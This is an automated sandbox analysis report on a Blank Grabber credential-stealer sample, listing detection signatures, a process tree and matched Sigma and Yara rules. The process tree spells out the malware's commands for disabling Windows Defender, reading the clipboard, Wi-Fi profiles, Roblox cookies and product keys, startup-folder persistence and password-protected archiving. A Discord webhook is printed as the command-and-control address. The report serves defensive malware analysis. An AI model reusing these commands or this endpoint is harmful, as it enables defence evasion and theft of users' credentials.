
Windows Analysis Report
SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe

Overview

General Information

Sample name: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Analysis ID: 1446241
MD5: 030c3c535b2d8f10ceaeede6e3fe23f2
SHA1: 032ef2c8e717960d9b49dd7e48e4fc761cb4cfed
SHA256: e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d
Tags: exe

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" MD5: 030C3C535B2D8F10CEAEEDE6E3FE23F2)
    • SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe (PID: 7656 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe" MD5: 030C3C535B2D8F10CEAEEDE6E3FE23F2)
      • cmd.exe (PID: 7708 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7864 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7840 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 4568 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7888 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3848 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5276 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5632 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8204 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6920 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8272 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8324 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7424 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8224 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8308 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8280 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8424 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8788 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8936 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 9028 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8584 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8732 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 8592 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8752 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8868 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8920 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8944 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9008 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9044 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 9104 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9124 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1212 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 1544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1992 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3124 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8404 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 4536 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8296 cmdline: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8316 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3716 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8172 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8644 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4864 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7628 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8736 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8668 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8920 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8904 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7456 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1220929699618750534/zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI76002\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", ProcessId: 7708, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7716, ProcessName: cmd.exe
Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *", ProcessId: 4536, ProcessName: cmd.exe
Source: Threat created; Author: Perez Diego (@darkquassar), oscd.community; Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 8920, StartAddress: 68232B0, TargetImage: C:\Windows\System32\tree.com, TargetProcessId: 8920
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 5632, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ParentProcessId: 7656, ParentProcessName: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'", ProcessId: 7708, ProcessName: cmd.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, ProcessId: 7656, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
